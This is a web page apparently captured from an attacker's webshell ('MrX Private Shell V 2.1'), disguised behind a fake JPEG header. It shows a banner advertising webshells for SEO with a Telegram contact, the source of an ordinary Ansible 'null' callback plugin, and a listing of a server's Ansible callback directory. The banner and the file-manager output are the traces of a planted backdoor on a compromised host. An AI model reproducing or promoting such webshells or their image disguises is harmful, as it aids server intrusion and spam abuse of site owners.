����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
# -*- coding: utf-8 -*-
# Copyright (c) 2017 Ansible Project
# GNU General Public License v3.0+ (see LICENSES/GPL-3.0-or-later.txt or https://www.gnu.org/licenses/gpl-3.0.txt)
# SPDX-License-Identifier: GPL-3.0-or-later
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
DOCUMENTATION = '''
author: Unknown (!UNKNOWN)
name: 'null'
type: stdout
requirements:
- set as main display callback
short_description: Don't display stuff to screen
description:
- This callback prevents outputing events to screen.
'''
from ansible.plugins.callback import CallbackBase
class CallbackModule(CallbackBase):
'''
This callback wont print messages to stdout when new callback events are received.
'''
CALLBACK_VERSION = 2.0
CALLBACK_TYPE = 'stdout'
CALLBACK_NAME = 'community.general.null'
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| cgroup_memory_recap.py | File | 4.12 KB | 0644 |
|
| context_demo.py | File | 1.88 KB | 0644 |
|
| counter_enabled.py | File | 10.95 KB | 0644 |
|
| dense.py | File | 17.1 KB | 0644 |
|
| diy.py | File | 52.32 KB | 0644 |
|
| elastic.py | File | 14.17 KB | 0644 |
|
| hipchat.py | File | 8.04 KB | 0644 |
|
| jabber.py | File | 3.94 KB | 0644 |
|
| log_plays.py | File | 4.23 KB | 0644 |
|
| loganalytics.py | File | 8.24 KB | 0644 |
|
| logdna.py | File | 6.77 KB | 0644 |
|
| logentries.py | File | 10.87 KB | 0644 |
|
| logstash.py | File | 13.51 KB | 0644 |
|
| mail.py | File | 8.81 KB | 0644 |
|
| nrdp.py | File | 6.57 KB | 0644 |
|
| null.py | File | 911 B | 0644 |
|
| opentelemetry.py | File | 20.92 KB | 0644 |
|
| say.py | File | 4.13 KB | 0644 |
|
| selective.py | File | 10.72 KB | 0644 |
|
| slack.py | File | 8.18 KB | 0644 |
|
| splunk.py | File | 9.78 KB | 0644 |
|
| sumologic.py | File | 6.3 KB | 0644 |
|
| syslog_json.py | File | 4.61 KB | 0644 |
|
| unixy.py | File | 10.82 KB | 0644 |
|
| yaml.py | File | 4.86 KB | 0644 |
|